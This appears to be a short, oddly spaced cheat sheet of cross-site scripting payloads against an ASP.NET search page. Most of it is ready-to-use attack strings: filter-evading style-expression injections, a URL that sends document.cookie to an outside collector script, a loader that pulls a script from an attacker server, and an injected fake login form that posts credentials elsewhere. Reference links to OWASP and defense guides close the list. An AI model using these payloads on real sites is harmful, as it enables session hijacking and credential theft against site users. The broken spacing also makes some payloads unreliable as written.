ASP.NET cross-site scripting (XSS) attack examples
Common attack code:
http://target/vuln-search.aspx?term= </XSS/*-*/STYLE = xss: e/**/xpression (alert ('xsss')>
Redirection attack:
http://target/vuln-search.aspx?term= </XSS/*-*/STYLE = xss: e/**/xpression (window. location =" http://www.xxx.com ")>
Cookie stealing:
http://target/vuln-search.aspx?term= </XSS/*-*/STYLE = xss: e/**/xpression (window. location =" http://www.xxx.com /Cookiemonster. php? Sid = "% 2bdocument. cookie)>
Unrestricted HTML injection from an external '.js' file:
http://target/vuln-search.aspx?term= </XSS/*-*/STYLE = xss: expression (myScript = document. body. appendChild (document. createElement ("script")> </XSS/*-*/STYLE = xss: expression (myScript. setAttribute ("src "," http://attackerserver/xss.js ")>
Where 'xss.js' could contain a snippet that overwrites the entire document's HTML body, i.e.:
document. body. innerHTML = '<B> since we can now insert brakets without having to escape the request filtering, we \'re free to insert any HTML tags </B> </br> <form name = "myform" action =" http://www.procheckup.com "> <Input type =" text "name =" login "> <br/> <input type =" password "name =" password "> </br> <input type = "submit" value = "Log in"> </form> ';
<object> <param name = "src" value = "javascript: alert (0)"> </param> </object>
<object data = "javascript: alert (0) ">
<isindex type = image src = 1 onerror = alert (1)>
<isindex action = javascript: alert (1) type = image
<x: script xmlns: x =" http://www.w3.org/1999/ Xhtml "> alert ('xss'); </x: script>
location = 'javascript: alert (0) ';
location = name;
http://site.com/?p= "; Eval (unescape (location) // # % 0 Aalert (0)
<B/alt = "1" onmouseover = InputBox + 1 language = vbs> test </B>
</a onmousemove = "alert (1) "> <a onmousemove =" alert (1) "> test </a>
XSS script list: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
XSS defense list: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
Some examples:
http://www.codeproject.com/Articles/573458/An-Absolute-Beginners-Tutorial-on-Cross-Site-Scrip
http://www.codeproject.com/Articles/617043/Hack-Proof-Your-ASP-NET-Application-From-Cross-Sit
http://software-security.sans.org/developer-how-to/developer-guide-xss
http://blogs.msdn.com/b/cisg/archive/2008/09/10/real-world-xss-vulnerabilities-in-asp-net-code.aspx
http://weblogs.asp.net/jongalloway/preventing-javascript-encoding-xss-attacks-in-asp-net-mvc
http://www.softwaresecured.com/2013/03/04/asp-net-security-code-review-techniques-cross-site-scripting-edition/
https://github.com/TelerikAcademy/ASP.NET-MVC/tree/master/04.%20ASP.NET%20Web%20Security
Other examples: http://www.securitysift.com/xss-and-cross-site-scripting-with-a-little-help-from-asp-net-and-ie9/